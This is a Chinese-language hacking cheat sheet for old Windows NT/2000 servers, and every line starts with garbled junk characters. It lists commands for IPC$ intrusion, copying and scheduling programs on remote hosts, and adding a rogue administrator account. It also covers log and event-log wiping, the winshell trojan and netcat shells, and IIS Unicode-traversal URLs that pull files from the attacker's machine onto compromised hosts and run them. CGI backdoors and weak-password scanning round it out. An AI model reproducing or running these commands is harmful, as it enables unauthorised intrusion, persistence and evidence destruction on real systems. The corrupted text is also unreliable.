网管和黑客都必须知道的命令
��"o���| f 常用的几条NET命令:
@�k<
e]�@r d3nx"=Cy0I (与远程主机建立空管连接) net use \\IP地址\ipc$ "" /use:""
)�^�Ha?;TS D)kh"c�K*1 (以管理员身份登录远程主机) net use \\IP地址\ipc$ "密码" /use:"Administrator"
A~2U9�f�+\ j|6�@�>T�1 (传送文件到远程主机WINNT目录下)copy 本机目录路径\程序 \\IP地址\admin$
g&79?h4UXQ 4jWzYuI�&J (查看远程主机时间) net time \\IP地址
jruXl>�T!U AD$$S.zoD< (定时启动某个程序) at \\IP地址 02:18 readme.exe
�K;n2mXYGM ,�H_b@$]n8 (查看共享) net view \\IP地址
�z �X�I [f `&�3hf�iI} (查看netbios工作组列表) nbtstat -A IP地址
L9lN�A�iOH d65fkz==A) (将远程主机C盘映射为自己的F盘) net use f: \\IP地址\c$ ""/user:"Administrator"
Z$UPLg3=;_ mYU7b8x�_� (这两条把自己增加到管理员组): net user 用户名 密码 /add
n;Nr[�hI�� Vxr_2Kr��a net localgroup Administrators 用户名 /add
o�{W4@�:Ib tQ,,krw�~ (断开连接) net use \\IP地址\ipc$ /delete
�z;�c~(o@4 *�Ce8(
"v, 扫尾:
2H,^�i,�� cWNZ +�Q8Y del C:\winnt\system32\logfiles\*.*
uG5�RE��� T(GEFnt�Y� del C:\winnt\ssytem32\config\*.evt
U-U^N�7�� �F!>92H~3G del C:\winnt\system32\dtclog\*.*
�X0���QY:? 8�!R +w�y del C:\winnt\system32\*.log
�LTn@OhC� `:�am��l�+ del C:\winnt\system32\*.txt
�B%��]y�LJ Zq�DanD�M del C:\winnt\*.txt
jfLkp�>2E' &Zzd�6[G+� del C:\winnt\*.log
\�Zn%�r&(� 1X� ?9Ji)h 一、netsvc.exe
Bq��l��5=p cC4� 2b2+
下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务:
_mEW�]9�Sp �*y}<7R��� netsvc /list \\IP地址
a>0���5Yxw H'2J!���/V netsvc schedule \\IP地址 /query
4�!�q4WQ ; 3�� �L:s5� netsvc \\IP地址 schedule /start
l�[,RA?i
{ !ek�};~(�� 二、OpenTelnet.exe
u|.c?fW'�3 eU*�0;���# 远程启动主机的Telnet服务,并绑定端口到7878,例如:
^�(Y}j�8sj &7fw�YV��� OpenTelnet \\IP地址 用户名 密码 1 7878
�4lb(qKea� �vqeWt[W
v 然后就可以telnet到主机的7878端口,进入DOS方式下:
>q�qI6@h]c $ ]fautQlt telnet IP地址 7878
�03%�`ouf Yn��~N;VUA 三、winshell.exe
L�ddk:u�&J ,�G���U|3� 一个非常小的木马(不到6K),telnet到主机的7878端口,输入密码winshell,当看到CMD>后,可打下面的命令:
u��%s@B�1j "mk4�O�4dF p Path (查看winshell主程序的路径信息)
r��Uz-\H(- AZ�HZ�U�d4 b reBoot (重新启动机器)
2 &�(w�\#' B�d8{25{c d shutDown (关闭机器)
y�F _@��^V c; ��M�F�� s Shell (执行后你就会看到可爱的“C:\>”)
q�^I/���� l���MQ_S"� x eXit (退出本次登录会话,此命令并不终止winshell的运行)
$:4*�?8�K2 l>kREfHq!{ CMD>
http://.../srv.exe (通过http下载其他网站上的文件到运行winshell的机器上)
Q�A�k.~�ob �<mk�'�n6B 四、3389登陆器,GUI方式登录远程主机的
2!Gb��4V� W� �ZAkp|R 五、elsave.exe
H}p5qW.tH: ��{,9^k'�9 事件日志清除工具
)tD[F�fvr� !�D \u��2h elsave -s \\IP地址 -l "application" -C
{\�P`-'C� ��c*@�#�0B elsave -s \\IP地址 -l "system" -C
MT3TWW�tZ: ��?x\t��E] elsave -s \\IP地址 -l "security" -C
�c@��&�`!e I\8F��.J1_ 执行后成功清除应用程序日志,系统日志,安全日志
rD?G7l<~>_ g,YJh(|�#{ 六、hbulot.exe
-,Oq=w*EV� ;�Pd nE~� 开启win2kserver和winxp的3389服务
2d:5~fE�Jp \�I[f@D�-J hbulot [/r]
H�O`�N]AMw tW8&:�L,m� 使用/r表示安装完成后自动重起目标使设置生效。
oR1H�J2>Z1 Z+%w�|Sx�� 七、nc.exe(netcat.exe)
e{}�o�Q�K ,SQ`, C
_5 一个很好的工具,一些脚本程序都要用到它,也可做溢出后的连接用。
zQ=c6xvm8� fK?/o��]vq 想要连接到某处: nc [-options] hostname port[s] [ports] ...
*i�)3�q+%. %RS~>�pK1 绑定端口等待连接: nc -l -p port [-options] [hostname] [port]
YR? �ujN�� F3Y/�Mi�w� 参数:
n{1;�BW#H� Z6S?xfhr'{ -e prog 程序重定向,一旦连接,就执行 [危险!!]
� L#>^�R � �|}0�7tU�q -g gateway source-routing hop point[s], up to 8
�!VoAN5�#; @�,i_�G�w) -G num source-routing pointer: 4, 8, 12, ...
>69-��[#P! +bh�R[V{0g -h 帮助信息
}Ng�evsV>; Jjr&+Q^3Tu -i secs 延时的间隔
n�]Z�() "D ~#SLb�=K � -l 监听模式,用于入站连接
4Y/kf%]]A �_X�e"��+� -n 指定数字的IP地址,不能用hostname
;NJx9�)7�< oz[�M�t
i* -o file 记录16进制的传输
`m_�('�N "�+{>"_KV� -p port 本地端口号
gT�&s &0_7 x�Rp;y�*�� -r 任意指定本地及远程端口
m~�;}8ObQE ">|G^�@|:A -s addr 本地源地址
5%#V>|@�e# M!�D�&a)\� -u UDP模式
5B)z}g�^h }1}�L&��M@ -v 详细输出——用两个-v可得到更详细的内容
w40 -K5wt> �cq�So%a�2 -w secs timeout的时间
_+*+���,Vx �0tS�<
/G8 -z 将输入输出关掉——用于扫描时
BufXn�Mh�. 八、TFTPD32.EXE
M7PG��s-�l H)rE-7(f�! 把自己的电脑临时变为一台FTP服务器,让肉鸡来下载文件,tftp命令要在肉鸡上执行,通常要利用Unicode漏洞或telnet到肉鸡,例如:
ui .riD[,O SF.�Is�=�b http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i 本机IP地址 get 文件名 c:\winnt\system32\文件名
h( �V:�-�D $�s�S;#r0 然后可以直接令文件运行:
~bnyk�%S
o 69iY)�Ob/� http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名
�WFm\ bZ�. pW,)y�o�4 九、prihack.exe是IIS的printer远程缓冲区溢出工具。idqover.exe是溢出idq的,选择“溢出后在一个端口监听”,然后用telnet连接它的监听端口,如果溢出成功,一连它的端口,绑定的命令马上执行。xploit.exe是一个图形界面的ida溢出,成功以后winxp下需要打winxp。
�G�5!J9@Yi �[yn\O=%5� 一○、ntis.exe、cmd.exe和cmdasp.asp是三个cgi-backdoor,exe要放到cgi-bin目录下,asp放到有ASP执行权限的目录。然后用IE浏览器连接。
Ep�UBO}q] m#Da�e\w&� 一、一 Xscan命令行运行参数说明:
��w�'Vm'zo MY w3+B+Jj 在检测过程中,按"[空格]"键可以查看各线程状态及扫描进度,按"q"键保存当前数据后提前退出程序,按"<ctrl+c>"强行关闭程序。
� �S�Cq:jI �W�20�H4!G 1.命令格式: xscan -host <起始IP>[-<终止IP>] <检测项目> [其他选项]
��VOk�SR6 H-C$�Jy)f" xscan -file <主机列表文件名> <检测项目> [其他选项]
CB�KLc�t>� A3s-C+�@X� 其中<检测项目> 含义如下:
�A�V]7�l}- -
U Elu4n& -port : 检测常用服务的端口状态(可通过\dat\config.ini文件的"PORT-SCAN-OPTIONS\PORT-LIST"项定制待检测端口列表);
Q^��}�Ib[ N_�liKhq�� -ftp : 检测FTP弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
(kmrWx=
$� 6��6C_X��T -ntpass : 检测NT-Server弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
8~�j���1�� �DcRvZ���H -cgi : 检测CGI漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
m�'��PU0x� y"T(�Unvc� -iis : 检测IIS漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
}��l<:^�lX t$�EL3�U/( [其他选项] 含义如下:
}M�Ig RQ9� �,Jq�Cxb�9 -v: 显示详细扫描进度
mhW*r�H*m �)�N3�XbbV -p: 跳过Ping不通的主机
OVUJ�iB�p� 5#�U=x ,7e -o: 跳过没有检测到开放端口的主机
{JlSfJ�w�! " ��7�g\X$ -t <并发线程数量[,并发主机数量]>: 指定最大并发线程数量和并发主机数量, 默认数量为100,10
